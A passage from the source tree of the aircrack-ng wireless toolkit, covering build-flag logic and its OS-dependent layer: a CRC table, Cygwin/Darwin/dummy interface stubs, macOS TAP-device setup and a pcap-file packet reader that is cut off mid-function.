libnl-tiny && echo Y) 94 | endif 95 | endif 96 | 97 | 98 | ifeq ($(NL1FOUND),Y) 99 | NLLIBNAME = libnl-1 100 | COMMON_CFLAGS += -DCONFIG_LIBNL 101 | endif 102 | 103 | ifeq ($(NLTFOUND),Y) 104 | NLLIBNAME = libnl-tiny 105 | COMMON_CFLAGS += -DCONFIG_LIBNL -DCONFIG_LIBNL20 106 | endif 107 | 108 | ifeq ($(NL3xFOUND),Y) 109 | COMMON_CFLAGS += -DCONFIG_LIBNL30 -DCONFIG_LIBNL 110 | LIBS += -lnl-genl-3 111 | NLLIBNAME = libnl-3.0 112 | endif 113 | 114 | ifeq ($(NL3FOUND),Y) 115 | COMMON_CFLAGS += -DCONFIG_LIBNL30 -DCONFIG_LIBNL 116 | LIBS += -lnl-genl 117 | NLLIBNAME = libnl-3.0 118 | endif 119 | 120 | # nl-3.1 has a broken libnl-gnl-3.1.pc file 121 | # as show by pkg-config --debug --libs --cflags --exact-version=3.1 libnl-genl-3.1;echo $? 122 | ifeq ($(NL31FOUND),Y) 123 | COMMON_CFLAGS += -DCONFIG_LIBNL30 -DCONFIG_LIBNL 124 | LIBS += -lnl-genl 125 | NLLIBNAME = libnl-3.1 126 | endif 127 | 128 | NLLIBNAME ?= $(error Cannot find development files for any supported version of libnl. install either libnl1 or libnl3.) 129 | 130 | LIBS += $(shell $(PKG_CONFIG) --libs $(NLLIBNAME)) 131 | COMMON_CFLAGS +=$(shell $(PKG_CONFIG) --cflags $(NLLIBNAME)) 132 | COMMON_CFLAGS := $(COMMON_CFLAGS) 133 | endif 134 | endif 135 | 136 | ifeq ($(subst TRUE,true,$(filter TRUE true,$(airpcap) $(AIRPCAP))),true) 137 | LIBAIRPCAP = -DHAVE_AIRPCAP -I$(AC_ROOT)/../developers/Airpcap_Devpack/include 138 | endif 139 | 140 | ifneq ($(origin CC),environment) 141 | ifeq ($(OSNAME), FreeBSD) 142 | CC = $(TOOL_PREFIX)cc 143 | CXX = $(TOOL_PREFIX)c++ 144 | else 145 | CC = $(TOOL_PREFIX)gcc 146 | CXX = $(TOOL_PREFIX)g++ 147 | endif 148 | endif 149 | 150 | # This is for autodetection of processor features in the new crypto cores. 151 | -include $(AC_ROOT)/common.cfg 152 | 153 | RANLIB ?= $(TOOL_PREFIX)ranlib 154 | ifneq ($(origin AR),environment) 155 | AR = $(TOOL_PREFIX)ar 156 | endif 157 | 158 | REVISION = lrc 159 | REVFLAGS ?= -D_REVISION=$(REVISION) 160 | 161 | OPTFLAGS = -D_FILE_OFFSET_BITS=64 162 | CFLAGS ?= -g -W -Wall -O3 163 | 164 | ifeq ($(subst TRUE,true,$(filter TRUE true,$(icc) $(ICC))),true) 165 | ICCMODE = Y 166 | CC = icc 167 | CXX = icpc 168 | AR = xiar 169 | CFLAGS += -no-prec-div 170 | endif 171 | 172 | # If we're building multibin make sure simd is disabled 173 | ifeq ($(subst TRUE,true,$(filter TRUE true,$(multibin) $(MULTIBIN))),true) 174 | SIMDCORE = false 175 | endif 176 | 177 | ifeq ($(HAS_NEON), Y) 178 | CFLAGS += -mfpu=neon 179 | endif 180 | 181 | ifeq ($(subst FALSE,false,$(filter FALSE false,$(newsse) $(NEWSSE))),false) 182 | CFLAGS += -DOLD_SSE_CORE=1 183 | else 184 | ifeq ($(AVX2FLAG), Y) 185 | ifeq ($(ICCMODE), Y) 186 | CFLAGS += -march=core-avx2 -DJOHN_AVX2 187 | else 188 | CFLAGS += -mavx2 -DJOHN_AVX2 189 | endif 190 | else 191 | ifeq ($(AVX1FLAG), Y) 192 | ifeq ($(ICCMODE), Y) 193 | CFLAGS += -march=corei7-avx -DJOHN_AVX 194 | else 195 | CFLAGS += -mavx -DJOHN_AVX 196 | endif 197 | else 198 | ifeq ($(SSEFLAG), Y) 199 | ifeq ($(ICCMODE), Y) 200 | CFLAGS += -march=corei7 201 | else 202 | CFLAGS += -msse2 203 | endif 204 | endif 205 | endif # AVX1FLAG 206 | endif # AVX2FLAG 207 | endif # NEWSSE 208 | 209 | ifeq ($(INTEL_ASM), Y) 210 | ASMFLAG = -masm=intel 211 | endif 212 | 213 | # This will enable -D_REENTRANT if compatible so we have thread-safe functions available to us via -pthread. 214 | ifeq ($(PTHREAD), Y) 215 | CFLAGS += -pthread 216 | endif 217 | 218 | CXXFLAGS = $(CFLAGS) $(ASMFLAG) -fdata-sections -ffunction-sections 219 | 220 | CFLAGS += $(OPTFLAGS) $(REVFLAGS) $(COMMON_CFLAGS) 221 | 222 | prefix = /usr/local 223 | bindir = $(prefix)/bin 224 | sbindir = $(prefix)/sbin 225 | mandir = $(prefix)/share/man/man1 226 | smandir = $(prefix)/share/man/man8 227 | datadir = $(prefix)/share 228 | docdir = $(datadir)/doc/aircrack-ng 229 | libdir = $(prefix)/lib 230 | etcdir = $(prefix)/etc/aircrack-ng 231 | 232 | ifneq ($(ICCMODE), Y) 233 | GCC_OVER41 = $(shell expr 41 \<= `$(CC) -dumpversion | awk -F. '{ print $1$2 }'`) 234 | GCC_OVER45 = $(shell expr 45 \<= `$(CC) -dumpversion | awk -F. '{ print $1$2 }'`) 235 | GCC_OVER49 = $(shell expr 49 \<= `$(CC) -dumpversion | awk -F. '{ print $1$2 }'`) 236 | ifeq ($(GCC_OVER41), 0) 237 | GCC_OVER41 = $(shell expr 4.1 \<= `$(CC) -dumpversion | awk -F. '{ print $1$2 }'`) 238 | endif 239 | ifeq ($(GCC_OVER45), 0) 240 | GCC_OVER45 = $(shell expr 4.5 \<= `$(CC) -dumpversion | awk -F. '{ print $1$2 }'`) 241 | endif 242 | ifeq ($(GCC_OVER49), 0) 243 | GCC_OVER49 = $(shell expr 4.9 \<= `$(CC) -dumpversion | awk -F. '{ print $1$2 }'`) 244 | endif 245 | 246 | ifeq ($(STACK_PROTECTOR), true) 247 | ifeq ($(GCC_OVER49), 0) 248 | ifeq ($(GCC_OVER41), 1) 249 | COMMON_CFLAGS += -fstack-protector 250 | endif 251 | endif 252 | 253 | ifeq ($(GCC_OVER49), 1) 254 | COMMON_CFLAGS += -fstack-protector-strong 255 | endif 256 | endif 257 | 258 | ifeq ($(GCC_OVER45), 1) 259 | CFLAGS += -Wno-unused-but-set-variable -Wno-array-bounds 260 | endif 261 | endif 262 | 263 | ifeq ($(subst TRUE,true,$(filter TRUE true,$(duma) $(DUMA))),true) 264 | LIBS += -lduma 265 | endif 266 | -------------------------------------------------------------------------------- /osdep/crctable_osdep.h: -------------------------------------------------------------------------------- 1 | #ifndef _CRCTABLE_OSDEP_H 2 | #define _CRCTABLE_OSDEP_H 3 | 4 | const unsigned long int crc_tbl_osdep[256] = 5 | { 6 | 0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3, 7 | 0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91, 8 | 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE, 0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 9 | 0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5, 10 | 0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B, 11 | 0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 12 | 0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F, 13 | 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924, 0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 14 | 0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433, 15 | 0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01, 16 | 0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457, 17 | 0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65, 18 | 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2, 0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 19 | 0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9, 20 | 0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F, 21 | 0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 22 | 0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683, 23 | 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8, 0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 24 | 0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7, 25 | 0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5, 26 | 0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B, 27 | 0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79, 28 | 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236, 0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 29 | 0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D, 30 | 0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713, 31 | 0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 32 | 0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777, 33 | 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C, 0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 34 | 0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB, 35 | 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9, 36 | 0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF, 37 | 0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D 38 | }; 39 | 40 | #endif /* crctable_osdep.h */ 41 | -------------------------------------------------------------------------------- /osdep/cygwin.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2007, 2008, Andrea Bittau 3 | * 4 | * OS dependent API for cygwin. It relies on an external 5 | * DLL to do the actual wifi stuff 6 | * 7 | * This program is free software; you can redistribute it and/or modify 8 | * it under the terms of the GNU General Public License as published by 9 | * the Free Software Foundation; either version 2 of the License, or 10 | * (at your option) any later version. 11 | * 12 | * This program is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 15 | * GNU General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU General Public License 18 | * along with this program; if not, write to the Free Software 19 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 20 | */ 21 | 22 | // DLL function that have to be exported 23 | #define CYGWIN_DLL_INIT cygwin_init 24 | #define CYGWIN_DLL_SET_CHAN cygwin_set_chan 25 | #define CYGWIN_DLL_SET_FREQ cygwin_set_freq 26 | #define CYGWIN_DLL_INJECT cygwin_inject 27 | #define CYGWIN_DLL_SNIFF cygwin_sniff 28 | #define CYGWIN_DLL_GET_MAC cygwin_get_mac 29 | #define CYGWIN_DLL_SET_MAC cygwin_set_mac 30 | #define CYGWIN_DLL_CLOSE cygwin_close 31 | 32 | /* 33 | * Prototypes: 34 | * int CYGWIN_DLL_INIT (char *param); 35 | * int CYGWIN_DLL_SET_CHAN (int chan); 36 | * int CYGWIN_DLL_INJECT (void *buf, int len, struct tx_info *ti); 37 | * int CYGWIN_DLL_SNIFF (void *buf, int len, struct rx_info *ri); 38 | * int CYGWIN_DLL_GET_MAC (unsigned char *mac); 39 | * int CYGWIN_DLL_SET_MAC (unsigned char *mac); 40 | * void CYGWIN_DLL_CLOSE (void); 41 | * 42 | * Notes: 43 | * - sniff can block and inject can be called by another thread. 44 | * - return -1 for error. 45 | * 46 | */ 47 | 48 | /* XXX the interface is broken. init() should return a void* that is passed to 49 | * each call. This way multiple instances can be open by a single process. 50 | * -sorbo 51 | * 52 | */ 53 | -------------------------------------------------------------------------------- /osdep/darwin.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2009, Kyle Fuller , based upon 3 | * freebsd.c by Andrea Bittau 4 | * 5 | * OS dependent API for Darwin. 6 | * 7 | * This program is free software; you can redistribute it and/or modify 8 | * it under the terms of the GNU General Public License as published by 9 | * the Free Software Foundation; either version 2 of the License, or 10 | * (at your option) any later version. 11 | * 12 | * This program is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 15 | * GNU General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU General Public License 18 | * along with this program; if not, write to the Free Software 19 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 20 | */ 21 | 22 | #include 23 | #include 24 | 25 | #include "osdep.h" 26 | 27 | struct wif *wi_open_osdep(char *iface) 28 | { 29 | if (iface) {} /* XXX unused parameter */ 30 | 31 | errno = EOPNOTSUPP; 32 | return NULL; 33 | } 34 | 35 | int get_battery_state(void) 36 | { 37 | errno = EOPNOTSUPP; 38 | return -1; 39 | } 40 | 41 | int create_tap(void) 42 | { 43 | errno = EOPNOTSUPP; 44 | return -1; 45 | } 46 | -------------------------------------------------------------------------------- /osdep/darwin_tap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2009, Kyle Fuller , based upon 3 | * freebsd_tap.c by Andrea Bittau 4 | * 5 | * OS dependent API for Darwin. TAP routines 6 | * 7 | * This program is free software; you can redistribute it and/or modify 8 | * it under the terms of the GNU General Public License as published by 9 | * the Free Software Foundation; either version 2 of the License, or 10 | * (at your option) any later version. 11 | * 12 | * This program is distributed in the hope that it will be useful, 13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 15 | * GNU General Public License for more details. 16 | * 17 | * You should have received a copy of the GNU General Public License 18 | * along with this program; if not, write to the Free Software 19 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 20 | */ 21 | 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | 34 | #include "osdep.h" 35 | 36 | #define MAX_TAP_DEVS 16 37 | 38 | struct tip_darwin { 39 | int tf_fd; 40 | int tf_ioctls; 41 | struct ifreq tf_ifr; 42 | char tf_name[MAX_IFACE_NAME]; 43 | int tf_destroy; 44 | }; 45 | 46 | static int ti_do_open_darwin(struct tif *ti, char *name) { 47 | int fd = -1; 48 | char iface[12]; 49 | struct stat st; 50 | struct tip_darwin *priv = ti_priv(ti); 51 | int s; 52 | unsigned int flags; 53 | struct ifreq *ifr; 54 | int i; 55 | 56 | /* open tap */ 57 | if (name) { 58 | fd = open(name, O_RDWR); 59 | } else { 60 | priv->tf_destroy = 1; /* we create, we destroy */ 61 | 62 | for (i = 0; i < MAX_TAP_DEVS; i++) { 63 | snprintf(iface, sizeof(iface), "/dev/tap%d", i); 64 | fd = open(iface, O_RDWR); 65 | 66 | if (fd != -1) { 67 | break; 68 | } 69 | } 70 | } 71 | 72 | if (fd == -1) { 73 | return -1; 74 | } 75 | 76 | /* get name */ 77 | if(fstat(fd, &st) == -1) 78 | goto err; 79 | snprintf(priv->tf_name, sizeof(priv->tf_name)-1, "%s", 80 | devname(st.st_rdev, S_IFCHR)); 81 | 82 | /* bring iface up */ 83 | s = socket(PF_INET, SOCK_DGRAM, 0); 84 | if (s == -1) 85 | goto err; 86 | priv->tf_ioctls = s; 87 | 88 | /* get flags */ 89 | ifr = &priv->tf_ifr; 90 | memset(ifr, 0, sizeof(*ifr)); 91 | snprintf(ifr->ifr_name, sizeof(ifr->ifr_name)-1, "%s", priv->tf_name); 92 | if (ioctl(s, SIOCGIFFLAGS, ifr) == -1) 93 | goto err2; 94 | flags = (ifr->ifr_flags & 0xffff); 95 | 96 | /* set flags */ 97 | flags |= IFF_UP; 98 | ifr->ifr_flags = flags & 0xffff; 99 | 100 | if (ioctl(s, SIOCSIFFLAGS, ifr) == -1) 101 | goto err2; 102 | 103 | return fd; 104 | err: 105 | /* XXX destroy */ 106 | close(fd); 107 | return -1; 108 | err2: 109 | close(s); 110 | goto err; 111 | } 112 | 113 | static void ti_do_free(struct tif *ti) { 114 | struct tip_darwin *priv = ti_priv(ti); 115 | 116 | free(priv); 117 | free(ti); 118 | } 119 | 120 | static void ti_destroy(struct tip_darwin *priv) { 121 | ioctl(priv->tf_ioctls, SIOCIFDESTROY, &priv->tf_ifr); 122 | } 123 | 124 | static void ti_close_darwin(struct tif *ti) { 125 | struct tip_darwin *priv = ti_priv(ti); 126 | 127 | if (priv->tf_destroy) 128 | ti_destroy(priv); 129 | 130 | close(priv->tf_fd); 131 | close(priv->tf_ioctls); 132 | ti_do_free(ti); 133 | } 134 | 135 | static char *ti_name_darwin(struct tif *ti) { 136 | struct tip_darwin *priv = ti_priv(ti); 137 | 138 | return priv->tf_name; 139 | } 140 | 141 | static int ti_set_mtu_darwin(struct tif *ti, int mtu) { 142 | struct tip_darwin *priv = ti_priv(ti); 143 | 144 | priv->tf_ifr.ifr_mtu = mtu; 145 | 146 | return ioctl(priv->tf_ioctls, SIOCSIFMTU, &priv->tf_ifr); 147 | } 148 | 149 | static int ti_set_mac_darwin(struct tif *ti, unsigned char *mac) { 150 | struct tip_darwin *priv = ti_priv(ti); 151 | struct ifreq *ifr = &priv->tf_ifr; 152 | 153 | ifr->ifr_addr.sa_family = AF_LINK; 154 | ifr->ifr_addr.sa_len = 6; 155 | memcpy(ifr->ifr_addr.sa_data, mac, 6); 156 | 157 | return ioctl(priv->tf_ioctls, SIOCSIFLLADDR, ifr); 158 | } 159 | 160 | static int ti_set_ip_darwin(struct tif *ti, struct in_addr *ip) { 161 | struct tip_darwin *priv = ti_priv(ti); 162 | struct ifaliasreq ifra; 163 | struct sockaddr_in *s_in; 164 | 165 | /* assume same size */ 166 | memset(&ifra, 0, sizeof(ifra)); 167 | strcpy(ifra.ifra_name, priv->tf_ifr.ifr_name); 168 | 169 | s_in = (struct sockaddr_in *) &ifra.ifra_addr; 170 | s_in->sin_family = PF_INET; 171 | s_in->sin_addr = *ip; 172 | s_in->sin_len = sizeof(*s_in); 173 | 174 | return ioctl(priv->tf_ioctls, SIOCAIFADDR, &ifra); 175 | } 176 | 177 | static int ti_fd_darwin(struct tif *ti) { 178 | struct tip_darwin *priv = ti_priv(ti); 179 | 180 | return priv->tf_fd; 181 | } 182 | 183 | static int ti_read_darwin(struct tif *ti, void *buf, int len) { 184 | return read(ti_fd(ti), buf, len); 185 | } 186 | 187 | static int ti_write_darwin(struct tif *ti, void *buf, int len) { 188 | return write(ti_fd(ti), buf, len); 189 | } 190 | 191 | static struct tif *ti_open_darwin(char *iface) { 192 | struct tif *ti; 193 | struct tip_darwin *priv; 194 | int fd; 195 | 196 | /* setup ti struct */ 197 | ti = ti_alloc(sizeof(*priv)); 198 | if (!ti) 199 | return NULL; 200 | ti->ti_name = ti_name_darwin; 201 | ti->ti_set_mtu = ti_set_mtu_darwin; 202 | ti->ti_close = ti_close_darwin; 203 | ti->ti_fd = ti_fd_darwin; 204 | ti->ti_read = ti_read_darwin; 205 | ti->ti_write = ti_write_darwin; 206 | ti->ti_set_mac = ti_set_mac_darwin; 207 | ti->ti_set_ip = ti_set_ip_darwin; 208 | 209 | /* setup iface */ 210 | fd = ti_do_open_darwin(ti, iface); 211 | if (fd == -1) { 212 | ti_do_free(ti); 213 | return NULL; 214 | } 215 | 216 | /* setup private state */ 217 | priv = ti_priv(ti); 218 | priv->tf_fd = fd; 219 | 220 | return ti; 221 | } 222 | 223 | struct tif *ti_open(char *iface) { 224 | return ti_open_darwin(iface); 225 | } 226 | -------------------------------------------------------------------------------- /osdep/dummy.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2007, 2008, Andrea Bittau 3 | * 4 | * OS dependent API for unsupported APIs. 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program; if not, write to the Free Software 18 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 19 | */ 20 | 21 | #include 22 | #include 23 | 24 | #include "osdep.h" 25 | 26 | struct wif *wi_open_osdep(char *iface) 27 | { 28 | if (iface) {} /* XXX unused parameter */ 29 | 30 | errno = EOPNOTSUPP; 31 | return NULL; 32 | } 33 | 34 | int get_battery_state(void) 35 | { 36 | errno = EOPNOTSUPP; 37 | return -1; 38 | } 39 | 40 | int create_tap(void) 41 | { 42 | errno = EOPNOTSUPP; 43 | return -1; 44 | } 45 | -------------------------------------------------------------------------------- /osdep/dummy_tap.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2007, 2008, Andrea Bittau 3 | * 4 | * OS dependent API for unsupported APIs. TAP routines 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program; if not, write to the Free Software 18 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 19 | */ 20 | 21 | #include 22 | #include 23 | 24 | #include "osdep.h" 25 | 26 | static struct tif *ti_open_dummy(char *iface) 27 | { 28 | if (iface) {} /* XXX unused parameter */ 29 | 30 | return NULL; 31 | } 32 | 33 | struct tif *ti_open(char *iface) 34 | { 35 | return ti_open_dummy(iface); 36 | } 37 | -------------------------------------------------------------------------------- /osdep/file.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2010 Andrea Bittau 3 | * 4 | * OS dependent API for using card via a pcap file. 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License as published by 8 | * the Free Software Foundation; either version 2 of the License, or 9 | * (at your option) any later version. 10 | * 11 | * This program is distributed in the hope that it will be useful, 12 | * but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | * GNU General Public License for more details. 15 | * 16 | * You should have received a copy of the GNU General Public License 17 | * along with this program; if not, write to the Free Software 18 | * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 19 | */ 20 | 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | 35 | #include "osdep.h" 36 | #include "pcap.h" 37 | #include "radiotap/radiotap_iter.h" 38 | 39 | struct priv_file { 40 | int pf_fd; 41 | int pf_chan; 42 | int pf_rate; 43 | int pf_dtl; 44 | unsigned char pf_mac[6]; 45 | }; 46 | 47 | static int file_read(struct wif *wi, unsigned char *h80211, int len, 48 | struct rx_info *ri) 49 | { 50 | struct priv_file *pf = wi_priv(wi); 51 | struct pcap_pkthdr pkh; 52 | int rc; 53 | unsigned char buf[4096]; 54 | int off = 0; 55 | struct ieee80211_radiotap_header *rh; 56 | struct ieee80211_radiotap_iterator iter; 57 | 58 | rc = read(pf->pf_fd, &pkh, sizeof(pkh)); 59 | if (rc != sizeof(pkh)) 60 | return -1; 61 | 62 | if (pkh.caplen > sizeof(buf)) { 63 | printf("Bad caplen %lu\n", (unsigned long) pkh.caplen); 64 | return 0; 65 | } 66 | 67 | assert(pkh.caplen <= sizeof(buf)); 68 | 69 | rc = read(pf->pf_fd, buf, pkh.caplen); 70 | if (rc != (int) pkh.caplen) 71 | return -1; 72 | 73 | if (ri) 74 | memset(ri, 0, sizeof(*ri)); 75 | 76 | switch (pf->pf_dtl) { 77 | case LINKTYPE_IEEE802_11: 78 | off = 0; 79 | break; 80 | 81 | case LINKTYPE_RADIOTAP_HDR: 82 | rh = (struct ieee80211_radiotap_header*) buf; 83 | off = le16_to_cpu(rh->it_len); 84 | 85 | if (ieee80211_radiotap_iterator_init(&iter, rh, rc, NULL) < 0) 86 | return -1; 87 | 88 | while (ieee80211_radiotap_iterator_next(&iter) >= 0) { 89 | switch (iter.this_arg_index) { 90 | case IEEE80211_RADIOTAP_FLAGS: 91 | if (*iter.this_arg & IEEE80211_RADIOTAP_F_FCS) 92 | rc -= 4; 93 | break; 94 | } 95 | } 96 | break; 97 | 98 | case LINKTYPE_PRISM_HEADER: 99 | if (buf[7] == 0x40) 100 | off = 0x40; 101 | else 102 | off = *((int *)(buf + 4)); 103 | 104 | rc -= 4; 105 | break; 106 | 107 | case LINKTYPE_PPI_HDR: 108 | off = le16_to_cpu(*(unsigned short *)(buf + 2)); 109 | 110 | /* for a while Kismet logged broken PPI headers */ 111 | if (off == 24 && le16_to_cpu(*(unsigned short *)(buf + 8)) == 2 ) 112 | off = 32; 113 | 114 | break; 115 | 116 | case LINKTYPE_ETHERNET: 117 | printf("Ethernet packets\n"); 118 | return 0; 119 | 120 | default: 121 | errx(1, "Unknown DTL %d", pf->pf_dtl); 122 | break; 123 | } 124 | 125 | rc -= off; 126 | assert(rc >= 0); 127 | 128 | if (rc > len) 129 | rc = len; 130 | 131 | memcpy(h80211, &buf[off], rc); 132 | 133 | return rc; 134 | } 135 | 136 | static int file_get_mac(struct wif *wi, unsigned char *mac) 137 | { 138 | struct priv_file *pn = wi_priv(wi); 139 | 140 | memcpy(mac, pn->pf_mac, sizeof(pn->pf_mac)); 141 | 142 | return 0; 143 | } 144 | 145 | static int file_write(struct wif *wi, unsigned char *h80211, int len, 146 | struct tx_info *ti) 147 | { 148 | struct priv_file *pn = wi_priv(wi); 149 | 150 | if (h80211 && ti && pn) {} 151 | 152 | return len; 153 | } 154 | 155 | static int file_set_channel(struct wif *wi, int chan) 156 | { 157 | struct priv_file *pf = wi_priv(wi); 158 | 159 | pf->pf_chan = chan; 160 | 161 | return 0; 162 | } 163 | 164 | static int file_get_channel(struct wif *wi) 165 | { 166 | struct priv_file *pf = wi_priv(wi); 167 | 168 | return pf->pf_chan; 169 | } 170 | 171 | static int file_set_rate(struct wif *wi, int rate) 172 | { 173 | struct priv_file *pf = wi_priv(wi); 174 | 175 | pf->pf_rate = rate; 176 | 177 | return 0; 178 | } 179 | 180 | static int file_get_rate(struct wif *wi) 181 | { 182 | struct priv_file *pf = wi_priv(wi); 183 | 184 | return pf->pf_rate; 185 | } 186 | 187 | static int file_get_monitor(struct wif *wi) 188 | { 189 | if (wi) {} 190 | 191 | return 1; 192 | } 193 | 194 | static void file_close(struct wif *wi) 195 | { 196 | struct priv_file *pn = wi_priv(wi); 197 | 198 | if (pn->pf_fd) 199 | close(pn->pf_fd); 200 | 201 | free(wi); 202 | } 203 | 204 | static int file_fd(struct wif *wi) 205 | { 206 | struct priv_file *pf = wi_priv(wi); 207 | 208 | return pf->pf_fd; 209 | } 210 | 211 | struct wif *file_open(char *iface) 212 | { 213 | struct wif *wi; 214 | struct priv_file *pf; 215 | int fd; 216 | struct pcap_file_header pfh; 